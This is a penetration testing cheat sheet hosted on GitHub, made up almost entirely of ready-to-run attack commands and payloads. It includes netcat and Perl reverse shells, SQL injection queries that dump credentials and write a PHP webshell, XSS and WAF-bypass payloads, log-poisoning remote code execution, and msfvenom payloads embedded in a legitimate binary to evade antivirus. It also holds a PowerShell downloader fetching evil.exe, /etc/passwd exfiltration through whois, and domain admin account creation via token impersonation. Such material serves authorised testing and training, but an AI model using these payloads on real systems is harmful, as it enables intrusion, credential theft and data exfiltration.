-
Notifications
You must be signed in to change notification settings - Fork 150
/
Pentest-Cheat-Sheet
338 lines (241 loc) · 13.6 KB
/
Pentest-Cheat-Sheet
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
***********************************************************************************************
Obtaining shell
***********************************************************************************************
Reverse Shell netcat:
nc -lvp 443 # Attacker listening for connection
nc -nv <IP Address> 443 -e /bin/sh # Victim launch connection & give a shell
HPING3:
/usr/sbin/hping3 <<< /bin/ls|
> ls
A B C D
SNMPWALK:
snmpwalk 192.168.1.15 $(nc -vv 192.168.1.42 8888 >> /tmp/t)
MAN:
root@w00t:~# man -P "/bin/ls $(whoami && /bin/sh)" ls
echo "test" > /tmp/tata
id
^Csh: 0: Can't open root
uid=0(root)
man: command error: sed -e '/^[[:space:]]*$/{ N; /^[[:space:]]*\n[[:space:]]*$/D; }' | (cd <fd 5> && LESS=-ix8RmPm Manual page ls(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB\%.. (press h for help or q to quit)$PM Manual page ls(1) ?ltline %lt?L/%L.:byte %bB?s/%s..?e (END):?pB %pB\%.. (press h for help or q to quit)$ MAN_PN=ls(1) /bin/sh root
uid=0(root) gid=0(root) groupes=0(root))
root@w00t:~# cat /tmp/tata
test
***********************************************************************************************
SQLi Basics
***********************************************************************************************
number of column:
id=3 order by 100-- - // play on order by value to find number
Get vulnerable column:
id=-3 union all select 1,2,3,4,5,6,7,8,9-- -
Get current user:
id=-3 union all select 1,2,3,4,5,user(),7,8,9-- -
(View pentestmonkey or http://www.sqlinjection.net/union/ for ideas)
Get DBs :
http://www.tata.com/index.php?id=-3 UNION SELECT 1,group_concat( schema_name,'<br>'),3,4,5 from information_schema.schemata -- -
List tables + columns:
id=-3 UNION SELECT 1,group_concat(table_name,0x3a, column_name,'<br>'),3,4,5 from information_schema.columns where table_schema ='DB_Cible' AND table_name LIKE '%user%' -- -
Same request based on columns names:
-3 UNION SELECT 1,group_concat(table_name,0x3a, column_name,'<br>'),3,4,5 from information_schema.columns where table_schema ='DB_Cible' AND column_name LIKE '%log%' -- -
Dump data from targeted DB + table + columns:
-3 UNION SELECT 1,group_concat( login,0x3a,mdp,'<br>'),3,4,5 from DB_Cible.user -- - // here user is the previous identified table_name, it may change...
Read file:
id=-3 UNION SELECT 1,load_file('/etc/hosts'),3,4,5 -- -
Code exec using "into outfile' (MySQL):
(phpinfo() payload in Hex.):
-7 UNION SELECT 1,2,3,4,5,0x3c3f70687020706870696e666f28293b203f3e into outfile 'C:\\wamp\\www\\pwnd.php'-- -
Webshell:
<pre><?php if($_REQUEST["cmd"]) {passthru( $_REQUEST["cmd"]);}?></pre>
Blind detection:
http://evil.com/index.php?id=29 and substring(version(),1,1)=5 -- -
Sub SELECT ok:
http://evil.com/index.php?id=29 and (select 1)=1 -- -
SQLMAP usage:
Google chrome "export cookie" module + Burp proxy usage:
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
SQLMAP tor+WaF bypassing + DBG (users enumeration):
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --users --tamper "space2morehash.py" -v 3 --check-tor --level=5 --risk=3 --threads=5
Tor usage: --tor --tor-type=SOCKS5
Random useragent: --random-agent
***********************************************************************************************
FIREWALKING
***********************************************************************************************
FW bypassing over TCP by source port fixiation:
traceroute -p444 -T target-ip --sport=1111 -d --back -A --max-hops=16
firewalk -n -pTCP -d target-port last-node-ip target-ip -s source-port
-S usage (ports range):
firewalk -n -S 20-445 -pTCPlast-node-ip target-ip -s 1028
Trick:
do not hesitate to play with src port value
nmap --script=firewalk --traceroute XXXXX --osscan-guess -sV -O -Pn -d --top-port=20 --reason -f
***********************************************************************************************
WIRELESS
***********************************************************************************************
WEP:
aircrack-ng suite
WPA/WPA2:
airmon-ng start wlan0
wash -i mon0
airodump-ng mon0
reaver -i mon0 -b XX:XX:XX:XX:XX:XX
reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
Client side attacks such like"karma atack" using Mana: https://github.com/sensepost/mana
PMKID attack (no client required):
PMKID capture : ./hcxdumptool -i wlan0mon --enable_status=15 -c 6 --filterlist=<BSSID> --filtermode=2 -o WPA2PSK.pcapng
PMKID extraction to a crackable format : ./hcxpcaptool -z E4200-WPA2PSK.16800 WPA2PSK.pcapng
Cracking to extract the final hash using hashcat: hashcat -m 16800 -a 3 -w 3 -o "cracked.txt" 'my_captured_pmkid_hash' ?d?d?d?d?d?d?d?d
Note that cracking can also be done using aircrack,JtR or hashcat using dictionnary attack
Final "hash" in hex format to clear text: echo <my_final_hash> | xxd -r -p
***********************************************************************************************
Pentest tricks and Methodology
***********************************************************************************************
Mail extraction from DB dump:
grep -EiEio '\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b' * |sort |uniq -c |sort | grep -v "pattern1"| grep -v "pattern2" |grep -v "pattern3"|grep -v "pattern4"|grep -v "pattern5"| sed -r -e "s/^.*[,:]([^,:]+@[^,:]+).*$/\1/g"
Vhosts enumeration:
cat vhosts.sh:
#!/bin/bash
echo""
echo "[+] Finding VHOSTS for: $1"
echo ""
curl http://api.hackertarget.com/reverseiplookup/?q=$1
Linux password cracking:
root@kali:~# unshadow passwd-file.txt shadow-file.txt
victim:$6$H4ndrFOW$FqzEd1MMbtEpB2azf5/xwx08arqM.jL0pk/k7ug9BksbguW81CQcof2IU4u./BExaKlc1:1000:1000:,,,:/home/victim:/bin/bash
root@kali:~# unshadow passwd-file.txt shadow-file.txt > unshadowed.txt
root@kali:~# john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
MSF basic knowledge:
auxiliary/scanner/portscan/tcp
post/windows/gather/enum_logged_on_users
post/multi/gather/dns_srv_lookup
post/windows/gather/enum_applications
post/windows/gather/enum_termserv (active RDP sessions)
post/windows/gather/enum_putty_saved_sessions (if putty)
post/windows/gather/credentials/credential_collector
post/windows/gather/enum_shares
auxiliary/scanner/smb/smb_enumshares // to view on which share we can access
post/windows/gather/enum_snmp (SNMP on compromised host?)
post/multi/recon/local_exploit_suggester
post/windows/gather/credentials/vnc
auxiliary/admin/mysql/mysql_enum
Use the capture module for all protocols like SMB in order to collect creds:
auxiliary/server/capture/smb
http://www.adeptus-mechanicus.com/codex/metalan/metalan.html
Metepreter keylogging:
keyscan:
https://www.offensive-security.com/metasploit-unleashed/keylogging/
post/windows/capture/keylog_recorder
Domain admin "problem":
use incognito
list_tokens -u
impersonate_token DOMAIN.DOM\\Domain_Admin_user
- Then spawn shell and:
net user Pentester tAT@M45t3r /ADD /DOMAIN
net group "Admin du domaine" Pentester /ADD
Host discovery:
nmap -sn 10.11.1.1-254 -oG ping_sweep_nmap.grep
grep Up ping_sweep_nmap.grep |cut -d " " -f2 >> list.txt
ALWAYS THINK ABOUT:
View ARP cache on each machine
View netstat output
Look for new subnet to pivot & pwn!
Todo:
Take a look at the patch management
Service fingerprinting
Null Sessions + default passwords
chek local FW:
netsh advfirewall firewall show rule name=all
SMB vuln. assessment:
nmap -v -p 445 --script=smb-vuln-* --script-args=unsafe=1 -iL List_windows.grep -Pn
Test all http 80/443 (if custom then launch dirb on it)
Identify/test network equipments:
scan tcp 22,21,23 and udp 161 (snmp)
if SNMP discovered:
BF community by using custom script
***********************************************************************************************
Basic Exploit Knowledge
***********************************************************************************************
Windows pwn basics:
Gadgets finding:
Using Immunity => !mona modules --then-- !mona find -s "\xff\xe4" -m VulnServer.exe (ou -m == module et -s == opcode here a classic JMP ESP)
Final payload:
payload = 'A' * 1040 # trouv via pattern_create pis pattern_offset
payload += struct.pack("I", 0x65d11d71) # EIP -> JMP ESP gadget identification via mona + Immunity
payload += "\x90" * 10 # nopsleds
payload += shellcode # shellcode (msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.244 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x0a\x0d" + nc -vv -l -p 4443)
***********************************************************************************************
Pentesting Generic
***********************************************************************************************
Brute-force attacks:
RDP:
ncrack -vv --user offsec -P wordlist_perso.txt rdp://10.11.1.31
SSH:
hydra -l root -P wordlist_perso.txt 10.11.1.251 ssh
.htaccess:
medusa -h 10.11.1.8 -u admin -P wordlist_perso.txt -M http -m DIR:/cgi-bin/ -T 8
Basic php webshell:
<pre><?php if($_REQUEST["cmd"]) {passthru( $_REQUEST["cmd"]);}?></pre>
XXS payload:
<script>location.href="http://10.11.0.244:8080/sL7oRAH"</script>
<meta http-equiv="refresh" content="0; URL=http://10.11.0.244:8080/sL7oRAH">
LFI exploitation:
Dump MySQL DB via LFI:
wget 'http://192.168.102.181/modules.php?name=Downloads&file=..\..\..\..\..\..\..\apachefriends\xampp\mysql\data\site\authors.MYI%00' -O authors.MYI
wget 'http://192.168.12.1/modules.php?name=Downloads&file=..\..\..\..\..\..\..\apachefriends\xampp\mysql\data\site\authors.MYD%00' -O authors.MYD
wget 'http://192.168.12.1/modules.php?name=Downloads&file=..\..\..\..\..\..\..\apachefriends\xampp\mysql\data\site\authors.frm%00' -O authors.frm
Then:
cp authors.* /var/lib/mysql/victim/
service mysql restart
mysql -> use victim; -> select * from authors;
RCE through LFI::
nc -nvv 10.11.4.4 80 // listener
<?php echo shell_exec($_GET['cmd']);?> // Payload (PHP webshell)
Inclusion in "access.log" and remote code execution:
http://10.11.4.4/addguestbook.php?name=test&comment=blah&cmd=ipconfig&LANG=../../../../../../../xampp\apache\logs\access.log%00&Submit=Submit
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.244 LPORT=4444 -f exe-only > msf.exe
The PowerShell (wget.ps1) script to DL our meterpreter look likes this:
echo $storageDir = $pwd > get.ps1
echo $webclient = New-Object System.Net.WebClient >> get.ps1
echo $url = "http://10.11.0.244:1337/evil.exe" >> get.ps1
echo $file = "msf.exe" >> get.ps1
echo $webclient.DownloadFile($url,$file) >> get.ps1
Finally it could be executed by using the following command (once the metasploit exploit/multi/handler was launched):
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
XSS stored (browser exploitation):
MSF : server/browser_autopwn2
CVE-2018-8495: (1 click RCE via Edge/I.E 11):
document.body.innerHTML ='<a id="q" href=\'wshfile:test/../../System32/SyncAppvPublishingServer.vbs" test test;wmic process call create powershell;"\'>Exploit !</a>';
BeeF Framework linked to MSF for more fun ;)
Store XSS in image file:
exiftool '-Caption-Abstract=<script>alert('stored\ xss');</script>' image.jpg
XSS WAF bypass (tested on 07/10/2019 against AWS WAF):
Basic payload for JS redirect on malicious URL:
window.location.replace("https://url.com/t.js ");
Then:
B64 encoding -> Double URLencoding
Final Payload looks like:
https://url.lol/en/t/p=<script>eval(atob(decodeURIComponent("payload")))//
Reverse shell final payload:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.11.0.244:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system("/bin/sh -c $_") while<>;'
Meterpreter payloads generation basics:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.0.244 LPORT=4444 -f asp > shell.asp
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.11.0.244 LPORT=4444 -f elf > shell
Inject the payload in a "legit" binary (AV bypassing for example):
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.244 LPORT=4444 -f exe -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_embedded.exe
Reverse shell JS (client side and web apps attacks):
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.244 LPORT=4443 -f js_le -e generic/none
Capturing hashes (windows O.S) via SMB:
- on attacker's machine, run a fake SMB server: "/usr/bin/impacket-smbserver PWN /tmp"
- on target: "powershell -executionpolicy bypass -nop -file \\UNC-PATH\payload.ps1" (permit to perform paylaod delivery AND to capture hashes)
Data exfiltration through "whois" utility:
- on attacker's machine, launch a listener like: nc -vvv -l -p 1337
- on victim: whois -h 10.11.13.37 -p 1337 $(cat /etc/passwd)
LolBins repositories for RCE, exfiltration and more:
- Unix systems: https://gtfobins.github.io/#
- Windows systems: https://lolbas-project.github.io/
Lolbin for NTLM hash exfiltration using an alternative way (released on January 24th 2020):
sxstrace trace -logfile:\\192.168.xx.xx\a
Insecure Redis instance (no password set) can be abused to collect credential by monitoring each command executed:
redis-cli -h 192.168.X.X monitor >> Redis_Dump.txt (or using https://github.com/kmkz/exploit/blob/master/RedisCredentialCollector.pl)
Manual A.D Recon TTP (Ryuk campaign style):
DC listing : nltest /dclist:domain.local
Domain trusts: nltest /domain_trusts /all_trusts
Identify D.A: net group "Domain admins" /DOMAIN